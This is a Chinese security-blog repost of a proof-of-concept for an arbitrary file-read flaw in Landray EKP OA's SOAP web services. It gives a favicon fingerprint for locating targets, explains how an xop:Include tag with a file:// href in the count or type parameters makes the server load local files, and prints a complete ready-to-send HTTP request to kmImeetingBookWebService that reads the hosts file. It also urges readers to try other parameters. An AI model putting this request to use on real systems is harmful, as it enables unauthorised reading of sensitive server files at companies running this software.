蓝凌OA任意文件读取(在野) POC

admin
admin
admin
139164
文章
114
评论
2025年1月11日11:20:35评论7 views字数 1863阅读6分12秒阅读模式
0x02 简介
蓝凌EKP由深圳市蓝凌软件股份有限公司自主研发,是一款全程在线数字化OA,应用于大中型企业在线化办公,包含流程管理、知识管理、会议管理、公文管理等等。蓝凌0A的thirdImSyncForKKWebService接口存在任意文件读取漏洞。攻击者可利用漏洞获取系统敏感信息。
0x03 指纹信息
web.icon=="302464c3f6207d57240649926cfc7bd4"
0x04 漏洞复现
在上一篇文章中分析说了任意文件读取接口不止那一处,因为他造成任意文件读取的不是像我们之前常见的filename,path,url这种。而是触发漏洞的是soap中包含了xop:Include标签,也就是我可以在poc中的任意位置插入paylaod。
SOAP 的 XOP 扩展:
SOAP 的 XOP 扩展:xop:Include 是 SOAP 附件优化机制(XML-binary Optimized Packaging)。如果服务器端 SOAP 框架支持 XOP,并未禁用 file:// 协议,它可能会尝试解析 href 指向的文件内容。触发条件:如果服务器端解析 SOAP 的 type 字段时,遇到 xop:Include 的 href 属性,会调用底层的 URI 解析方法(如 new URL().openStream()),加载指定文件。
那么还有另外的几个webservice接口中也是存在任意文件读取漏洞的。kmImeetingBookWebService接口,触发漏洞的参数是count,其实也就是说在任意的service接口中带有count参数或者type参数都能够触发漏洞。回显还是正常的base64数据需要解密就能或者到数据了。
漏洞payload
POST /sys/webservice/kmImeetingBookWebService HTTP/1.1Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: SESSION=MmM1ZWZjYWQtZDQ1Mi00NWU3LWI4ZmMtNmQwY2UyYWRkNzEzConnection: close closeContent-Type: multipart/related; boundary=----oxmmdmlnvlx08yluof5qSOAPAction: Content-Type: text/xml;charset=UTF-8Host: Content-Length: 597------oxmmdmlnvlx08yluof5qContent-Disposition: form-data; name="111"<soapenv:Envelopexmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"xmlns:web="http://webservice.imeeting.km.kmss.landray.com/"><soapenv:Header/><soapenv:Body><web:getImeetingBook><arg0><!--type: string--><count><xop:Includexmlns:xop="http://www.w3.org/2004/08/xop/include"href="file:///C:WindowsSystem32driversetchosts"/></count></arg0></web:getImeetingBook></soapenv:Body></soapenv:Envelope>------oxmmdmlnvlx08yluof5q--
蓝凌OA任意文件读取(在野) POC
其实还有好几个参数都存在大家可以去试试

原文始发于微信公众号(实战安全研究):蓝凌OA任意文件读取(在野)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月11日11:20:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   蓝凌OA任意文件读取(在野) POChttps://cn-sec.com/archives/3613890.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息